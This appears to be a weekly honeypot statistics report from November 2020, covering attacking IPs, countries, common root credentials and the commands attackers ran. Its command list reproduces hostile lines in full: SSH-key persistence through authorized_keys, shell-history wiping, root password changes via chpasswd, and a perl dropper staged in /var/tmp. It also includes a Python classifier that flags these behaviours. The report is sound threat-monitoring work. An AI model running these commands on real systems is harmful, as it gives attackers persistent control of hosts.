Honey Pot – Previous week 15th November 2020

This week we saw a dip in IPs hitting the Honey Pot, down to 438 compared to 1429 last week. This also means fewer countries of origin, fewer TCP forwarding requests and fewer commands run.

Total attacking IPs: 438
Total countries: 49
Total successful user/pass combos: 648
Total commands run: 251
Total TCP forward requests: 8395

TOP 30 Attacking IPs

188.166.89.44 continues to dominate the Honey Pot; its hit count is roughly 19x that of the next IP, 5.188.86.216. The IP that held second spot last week no longer appears on the list, which is a good indication that the host has been cleaned.


Countries of Origin

We continue to see China and the United States hold the first and second spots. Russia has moved up to 3rd from last week's 6th spot.

104 China
87 United States
25 Russia
18 Ireland
18 India
17 France
17 Singapore
16 Panama
15 Germany
14 Netherlands
12 Vietnam
9 Brazil
8 South Korea
7 Canada
6 Romania
6 United Kingdom
5 Poland
5 Colombia
3 Italy
3 Hong Kong
3 Indonesia
2 Argentina
2 Republic of Lithuania
2 Spain
2 Sweden
2 Finland
2 None
2 Mexico
2 Tunisia
2 Latvia

Username and password combos

Nothing has really changed here since last week: root/admin continues to be number 1 with 26,579 requests.

26579 root/admin
71 root/root
51 root/1234
46 root/123456
37 root/QWEqwe123
36 root/ZAQ!2wsx
35 root/QAZ!2wsx
16 root/changeme
13 root/writer
10 root/1234567890

TOP 30 Commands

The top command for the second week in a row is uname -a;nproc. The Thorbins.sh attack is no longer listed. No droppers were recorded being deployed, as it has been a quiet week.

1248 uname -a;nproc
255 uname -s -v -n -r
224 uname -a
221 cat /proc/cpuinfo | grep name | wc -l
220 uname
220 crontab -l
220 ls -lh $(which ls)
220 which ls
220 w
220 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
220 top
220 lscpu | grep Model
220 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
220 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
220 cat /proc/cpuinfo | grep model | grep name | wc -l
220 uname -m
173 uname -a
30 uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys
15 perl /var/tmp/clamav.pl;rm -rf /var/tmp/clamav.pl
15 scp -t /var/tmp/clamav.pl
5 uname -a ;
2 ps | grep '[Mm]iner'
2 /ip cloud print
2 ifconfig
2 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
2 ps -ef | grep '[Mm]iner'
2 cat /proc/cpuinfo
2 echo Hi | cat -n
1 echo "root:SEFDfHeFf9Bb"|chpasswd|bash
1 echo "root:rDDhLMIBUvqU"|chpasswd|bash
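As an added defender-side example (not code from the original post), here is a small Python classifier that tallies honeypot command lines like the ones above and tags the behaviours they show: recon, SSH-key persistence via authorized_keys, shell-history tampering, root password change via chpasswd, and dropper staging under /var/tmp. The sample commands, keys and password are constructed stand-ins for this week's entries.

```python
import re
from collections import Counter

# Constructed sample of one honeypot session's executed commands (stand-ins for the
# entries above; the keys and the password are placeholders, not the real values).
SAMPLE_COMMANDS = [
    "uname -a;nproc",
    "uname -a;nproc",
    "cat /proc/cpuinfo | grep name | wc -l",
    'cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAAEXAMPLEKEYONE== mdrfckr"'
    ">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
    "uname -a;unset HISTORY HISTFILE HISTSAVE;history -n;export HISTFILE=/dev/null;cd;mkdir .ssh;"
    "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAAEXAMPLEKEYTWO==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys",
    'echo "root:EXAMPLEPW"|chpasswd|bash',
    "scp -t /var/tmp/clamav.pl",
    "perl /var/tmp/clamav.pl;rm -rf /var/tmp/clamav.pl",
    "ps | grep '[Mm]iner'",
]

# Behaviour rules: (tag, regex). Each mirrors a pattern seen in this week's command list.
RULES = [
    ("ssh_key_persistence", re.compile(r"authorized_keys|\.auth_k")),
    ("history_tampering", re.compile(r"unset\s+HIST|HISTFILE=/dev/null|history -n")),
    ("root_password_change", re.compile(r"\bchpasswd\b")),
    ("dropper_staging", re.compile(r"\bscp -t\b|/var/tmp/\S+\.(?:pl|sh)")),
    ("miner_check", re.compile(r"\[Mm\]iner|\bminer\b", re.I)),
    ("recon", re.compile(r"^(?:uname|nproc|lscpu|cat /proc/cpuinfo|w|top|free|crontab|ifconfig)\b")),
]

def classify(cmd):
    """Return the set of behaviour tags that match one command line."""
    return {tag for tag, rx in RULES if rx.search(cmd)}

def summarise(commands):
    """Tally raw commands (the report's TOP list) and behaviour tags across a session log."""
    top = Counter(commands)
    tags = Counter(tag for cmd in commands for tag in classify(cmd))
    return top, tags

def injected_keys(commands):
    """Pull out public keys being written into authorized_keys, so a host audit of
    ~/.ssh/authorized_keys on real systems can flag them."""
    key_rx = re.compile(r"ssh-(?:rsa|ed25519) [A-Za-z0-9+/=]+")
    return sorted({m.group(0) for cmd in commands if "authorized_keys" in cmd
                   for m in key_rx.finditer(cmd)})

if __name__ == "__main__":
    top, tags = summarise(SAMPLE_COMMANDS)
    for cmd, n in top.most_common(3):
        print(n, cmd)
    print(dict(tags))
    print(injected_keys(SAMPLE_COMMANDS))
```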

TOP 30 TCP forward Transmission

We continue to see Yandex (ya.ru) as the main target of the TCP forward requests, followed by Evernote.


This week was much quieter than the previous 4 weeks; let's see if this becomes the norm.